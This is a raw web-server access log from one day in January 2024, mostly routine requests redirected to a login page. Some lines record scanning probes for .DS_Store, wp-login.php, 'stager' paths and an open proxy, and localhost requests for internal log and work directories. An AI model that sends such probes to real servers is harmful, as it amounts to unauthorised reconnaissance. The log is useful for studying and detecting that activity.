36.99.136.129 - - [16/Jan/2024:08:09:36 -0500] "GET /login HTTP/1.1" 200 4254
36.99.136.129 - - [16/Jan/2024:08:09:36 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
36.99.136.129 - - [16/Jan/2024:08:09:37 -0500] "GET / HTTP/1.1" 302 -
36.99.136.137 - - [16/Jan/2024:08:09:37 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.157 - - [16/Jan/2024:08:09:37 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.177 - - [16/Jan/2024:08:09:38 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.157 - - [16/Jan/2024:08:09:38 -0500] "GET / HTTP/1.1" 302 -
111.7.96.157 - - [16/Jan/2024:08:09:39 -0500] "GET /login HTTP/1.1" 200 4254
36.99.136.128 - - [16/Jan/2024:08:09:39 -0500] "GET /login HTTP/1.1" 200 4254
154.127.54.49 - - [16/Jan/2024:08:09:39 -0500] "GET /login HTTP/1.1" 200 4254
36.99.136.128 - - [16/Jan/2024:08:09:39 -0500] "GET /login HTTP/1.1" 200 4254
36.99.136.137 - - [16/Jan/2024:08:09:40 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
36.99.136.137 - - [16/Jan/2024:08:09:41 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.157 - - [16/Jan/2024:08:09:42 -0500] "GET / HTTP/1.1" 302 -
111.7.96.157 - - [16/Jan/2024:08:09:43 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.165 - - [16/Jan/2024:08:09:44 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
36.99.136.128 - - [16/Jan/2024:08:09:44 -0500] "GET / HTTP/1.1" 302 -
36.99.136.128 - - [16/Jan/2024:08:09:44 -0500] "GET /login HTTP/1.1" 200 4254
36.99.136.137 - - [16/Jan/2024:08:09:46 -0500] "GET / HTTP/1.1" 302 -
111.7.96.157 - - [16/Jan/2024:08:09:46 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
36.99.136.136 - - [16/Jan/2024:08:09:47 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.157 - - [16/Jan/2024:08:09:48 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
36.99.136.137 - - [16/Jan/2024:08:09:52 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.161 - - [16/Jan/2024:08:09:56 -0500] "GET / HTTP/1.1" 302 -
111.7.96.167 - - [16/Jan/2024:08:09:57 -0500] "GET / HTTP/1.1" 302 -
36.99.136.136 - - [16/Jan/2024:08:09:57 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.161 - - [16/Jan/2024:08:09:57 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.167 - - [16/Jan/2024:08:09:57 -0500] "GET /login HTTP/1.1" 200 4254
36.99.136.129 - - [16/Jan/2024:08:09:57 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.161 - - [16/Jan/2024:08:09:58 -0500] "GET / HTTP/1.1" 302 -
111.7.96.167 - - [16/Jan/2024:08:09:58 -0500] "GET / HTTP/1.1" 302 -
111.7.96.161 - - [16/Jan/2024:08:09:59 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.162 - - [16/Jan/2024:08:10:02 -0500] "GET / HTTP/1.1" 302 -
111.7.96.162 - - [16/Jan/2024:08:10:02 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.162 - - [16/Jan/2024:08:10:03 -0500] "GET / HTTP/1.1" 302 -
111.7.96.152 - - [16/Jan/2024:08:10:04 -0500] "GET / HTTP/1.1" 302 -
111.7.96.161 - - [16/Jan/2024:08:10:04 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.152 - - [16/Jan/2024:08:10:04 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.162 - - [16/Jan/2024:08:10:04 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.162 - - [16/Jan/2024:08:10:05 -0500] "GET / HTTP/1.1" 302 -
111.7.96.152 - - [16/Jan/2024:08:10:06 -0500] "GET / HTTP/1.1" 302 -
111.7.96.152 - - [16/Jan/2024:08:10:07 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.162 - - [16/Jan/2024:08:10:08 -0500] "GET / HTTP/1.1" 302 -
111.7.96.162 - - [16/Jan/2024:08:10:08 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.167 - - [16/Jan/2024:08:10:08 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.162 - - [16/Jan/2024:08:10:09 -0500] "GET / HTTP/1.1" 302 -
111.7.96.162 - - [16/Jan/2024:08:10:10 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.162 - - [16/Jan/2024:08:10:10 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.162 - - [16/Jan/2024:08:10:11 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.152 - - [16/Jan/2024:08:10:11 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.162 - - [16/Jan/2024:08:10:14 -0500] "GET / HTTP/1.1" 302 -
111.7.96.162 - - [16/Jan/2024:08:10:14 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
111.7.96.162 - - [16/Jan/2024:08:10:15 -0500] "GET /login HTTP/1.1" 200 4254
111.7.96.162 - - [16/Jan/2024:08:10:23 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
36.99.136.128 - - [16/Jan/2024:08:10:45 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
127.0.0.1 - - [16/Jan/2024:08:46:57 -0500] "GET /wp-login.php HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:08:46:59 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:10:42:02 -0500] "GET / HTTP/1.1" 302 -
87.236.176.213 - - [16/Jan/2024:10:51:44 -0500] "GET / HTTP/1.1" 302 -
87.236.176.213 - - [16/Jan/2024:10:51:44 -0500] "GET /login HTTP/1.1" 200 4254
87.236.176.207 - - [16/Jan/2024:10:51:45 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
127.0.0.1 - - [16/Jan/2024:12:59:59 -0500] "GET /temp?C=S%3BO%3DA HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:13:00:03 -0500] "GET /login HTTP/1.1" 200 4254
54.223.58.116 - - [16/Jan/2024:13:15:20 -0500] "GET /.DS_Store HTTP/1.1" 302 -
54.223.58.116 - - [16/Jan/2024:13:15:20 -0500] "GET /login HTTP/1.1" 200 4254
167.94.145.55 - - [16/Jan/2024:13:46:41 -0500] "GET / HTTP/1.1" 302 -
167.94.145.55 - - [16/Jan/2024:13:46:44 -0500] "GET / HTTP/1.1" 302 -
167.94.145.55 - - [16/Jan/2024:13:46:44 -0500] "PRI * HTTP/2.0" 505 -
167.94.145.55 - - [16/Jan/2024:13:46:48 -0500] "GET /login HTTP/1.1" 200 4254
167.94.145.55 - - [16/Jan/2024:13:46:48 -0500] "PRI * HTTP/2.0" 505 -
167.94.145.55 - - [16/Jan/2024:13:46:48 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
167.94.145.55 - - [16/Jan/2024:13:46:48 -0500] "GET /favicon.ico HTTP/1.1" 302 -
167.94.145.55 - - [16/Jan/2024:13:46:48 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:13:54:38 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:14:27:04 -0500] "GET /lib?C=D%3BO%3DA HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:14:27:06 -0500] "GET /login HTTP/1.1" 200 4254
109.205.213.198 - - [16/Jan/2024:14:47:37 -0500] "GET / HTTP/1.1" 302 -
106.75.148.239 - - [16/Jan/2024:17:09:18 -0500] "GET /QqBX HTTP/1.1" 302 -
106.75.148.239 - - [16/Jan/2024:17:09:18 -0500] "GET /login HTTP/1.1" 200 4254
106.75.148.239 - - [16/Jan/2024:17:09:19 -0500] "GET /8zs8 HTTP/1.1" 302 -
106.75.148.239 - - [16/Jan/2024:17:09:19 -0500] "GET /login HTTP/1.1" 200 4254
106.75.148.239 - - [16/Jan/2024:17:09:20 -0500] "GET stager HTTP/1.1" 400 -
106.75.148.239 - - [16/Jan/2024:17:09:20 -0500] "GET stager64 HTTP/1.1" 400 -
127.0.0.1 - - [16/Jan/2024:17:10:44 -0500] "GET /logs/catalina.2022-03-14.log HTTP/1.1" 200 2145
66.45.237.154 - - [16/Jan/2024:17:19:15 -0500] "CONNECT google.com:443 HTTP/1.1" 400 -
127.0.0.1 - - [16/Jan/2024:17:19:25 -0500] "GET /bin?C=D%3BO%3DA HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:17:19:29 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:17:23:58 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:17:23:59 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:17:26:21 -0500] "GET /bin?C=S%3BO%3DA HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:17:26:24 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:20:09:06 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:20:09:06 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:20:09:07 -0500] "GET /bin/D:/ HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:20:27:04 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:20:27:04 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:20:36:05 -0500] "GET /work/Catalina/localhost/tomcat.tomcat.5/org/?C=S;O=D HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:22:40:34 -0500] "GET /webapps?C=N%3BO%3DD HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:22:40:37 -0500] "GET /login HTTP/1.1" 200 4254